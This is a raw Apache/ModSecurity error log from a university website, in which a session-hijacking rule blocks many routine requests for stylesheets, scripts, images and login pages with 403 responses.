[Mon Aug 28 08:44:22.007434 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv79sCo-f0AAJbPENUAAAAC"]
[Mon Aug 28 08:44:22.043976 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv79sCo-f0AAJXyOj4AAAAM"]
[Mon Aug 28 08:44:22.244117 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv79sCo-f0AAJbzcAMAAAAD"]
[Mon Aug 28 08:44:22.307458 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv79sCo-f0AAJWfaCoAAAAI"]
[Mon Aug 28 08:44:22.409241 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv79sCo-f0AAJaL2TYAAAAG"]
[Mon Aug 28 08:44:22.502180 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv79sCo-f0AAJb0F8gAAAAK"]
[Mon Aug 28 08:44:22.774948 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv79sCo-f0AAJXyOj8AAAAM"]
[Mon Aug 28 08:44:22.958873 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv79sCo-f0AAJSr30YAAAAO"]
[Mon Aug 28 08:44:23.085238 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv798Co-f0AAJZmptoAAAAA"]
[Mon Aug 28 08:44:23.223220 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv798Co-f0AAJWfaCsAAAAI"]
[Mon Aug 28 08:44:23.427645 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv798Co-f0AAJbPENYAAAAC"]
[Mon Aug 28 08:44:23.544333 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv798Co-f0AAJSr30cAAAAO"]
[Mon Aug 28 08:44:23.730155 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv798Co-f0AAJbzcAQAAAAD"]
[Mon Aug 28 08:44:23.857583 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv798Co-f0AAJbxo68AAAAJ"]
[Mon Aug 28 08:44:23.995724 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv798Co-f0AAJaL2TcAAAAG"]
[Mon Aug 28 08:44:24.003938 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv7@MCo-f0AAJZmptsAAAAA"]
[Mon Aug 28 08:44:24.007319 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv7@MCo-f0AAJSr30gAAAAO"]
[Mon Aug 28 08:44:24.024042 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv7@MCo-f0AAJbxo7AAAAAJ"]
[Mon Aug 28 08:44:24.026741 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv7@MCo-f0AAJb0F8kAAAAK"]
[Mon Aug 28 08:44:24.039998 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv7@MCo-f0AAJbzcAUAAAAD"]
[Mon Aug 28 08:44:24.123938 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv7@MCo-f0AAJbPENcAAAAC"]
[Mon Aug 28 08:44:24.127026 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv7@MCo-f0AAJWfaCwAAAAI"]
[Mon Aug 28 08:44:24.133247 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv7@MCo-f0AAJaL2TgAAAAG"]
[Mon Aug 28 08:44:24.142785 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv7@MCo-f0AAJZmptwAAAAA"]
[Mon Aug 28 08:44:24.150753 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv7@MCo-f0AAJXyOkAAAAAM"]
[Mon Aug 28 08:44:24.259486 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv7@MCo-f0AAJb0F8oAAAAK"]
[Mon Aug 28 08:44:24.367846 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv7@MCo-f0AAJbPENgAAAAC"]
[Mon Aug 28 08:44:24.623529 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv7@MCo-f0AAJbxo7EAAAAJ"]
[Mon Aug 28 08:44:24.835129 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv7@MCo-f0AAJSr30kAAAAO"]
[Mon Aug 28 08:44:24.952870 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv7@MCo-f0AAJbzcAYAAAAD"]
[Mon Aug 28 08:44:25.117653 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv7@cCo-f0AAJXyOkEAAAAM"]
[Mon Aug 28 08:44:25.243207 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv7@cCo-f0AAJZmpt0AAAAA"]
[Mon Aug 28 08:44:40.539623 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv8CMCo-f0AAJbPENkAAAAC"]
[Mon Aug 28 08:45:00.107307 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv8HMCo-f0AAJTioe4AAAAE"]
[Mon Aug 28 08:45:26.848803 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8NsCo-f0AAJb3RUgAAAAH"]
[Mon Aug 28 08:45:30.073101 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/pendaftaran/"] [unique_id "ZOv8OsCo-f0AAJSr31gAAAAO"]
[Mon Aug 28 08:45:30.297549 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8OsCo-f0AAJbzcAgAAAAD"]
[Mon Aug 28 08:45:36.175533 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv8QMCo-f0AAJXyOlEAAAAM"]
[Mon Aug 28 08:45:37.240146 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/pendaftar"] [unique_id "ZOv8QcCo-f0AAJbPEOIAAAAC"]
[Mon Aug 28 08:45:39.476243 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/pendaftar"] [unique_id "ZOv8Q8Co-f0AAJbzcAkAAAAD"]
[Mon Aug 28 08:45:41.475170 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv8RcCo-f0AAJWfaDgAAAAI"]
[Mon Aug 28 08:45:42.526228 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv8RsCo-f0AAJb20-kAAAAB"]
[Mon Aug 28 08:45:45.863460 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv8ScCo-f0AAJbPEOMAAAAC"]
[Mon Aug 28 08:45:53.987777 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv8UcCo-f0AAJWfaDkAAAAI"]
[Mon Aug 28 08:46:03.257015 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8W8Co-f0AAJb20-oAAAAB"]
[Mon Aug 28 08:46:04.507570 2023] [:error] [pid 38648] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv8XMCo-f0AAJb4sRgAAAAL"]
[Mon Aug 28 08:46:04.507939 2023] [:error] [pid 38059] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv8XMCo-f0AAJSr31kAAAAO"]
[Mon Aug 28 08:46:04.523699 2023] [:error] [pid 38607] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv8XMCo-f0AAJbPEOUAAAAC"]
[Mon Aug 28 08:46:04.549458 2023] [:error] [pid 38502] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv8XMCo-f0AAJZmpuEAAAAA"]
[Mon Aug 28 08:46:04.549621 2023] [:error] [pid 38607] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv8XMCo-f0AAJbPEOYAAAAC"]
[Mon Aug 28 08:46:04.738796 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8XMCo-f0AAJbxo84AAAAJ"]
[Mon Aug 28 08:46:05.267149 2023] [:error] [pid 38607] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8XcCo-f0AAJbPEOcAAAAC"]
[Mon Aug 28 08:46:05.718579 2023] [:error] [pid 38647] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8XcCo-f0AAJb3RUkAAAAH"]
[Mon Aug 28 08:46:10.605340 2023] [:error] [pid 38386] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8YsCo-f0AAJXyOlMAAAAM"]
[Mon Aug 28 08:46:11.846522 2023] [:error] [pid 38114] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8Y8Co-f0AAJTiof0AAAAE"]
[Mon Aug 28 08:46:13.976907 2023] [:error] [pid 38303] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8ZcCo-f0AAJWfaEIAAAAI"]
[Mon Aug 28 08:46:14.288336 2023] [:error] [pid 38641] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8ZsCo-f0AAJbxo9AAAAAJ"]
[Mon Aug 28 08:46:21.291257 2023] [:error] [pid 38303] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8bcCo-f0AAJWfaEMAAAAI"]
[Mon Aug 28 08:46:21.622296 2023] [:error] [pid 38683] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8bcCo-f0AAJcb464AAAAP"]
[Mon Aug 28 08:47:18.905648 2023] [:error] [pid 38685] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv8psCo-f0AAJcdfHoAAAAR"]
[Mon Aug 28 08:47:19.329402 2023] [:error] [pid 38647] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv8p8Co-f0AAJb3RVoAAAAH"]
[Mon Aug 28 08:47:19.346491 2023] [:error] [pid 38643] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv8p8Co-f0AAJbzcBoAAAAD"]
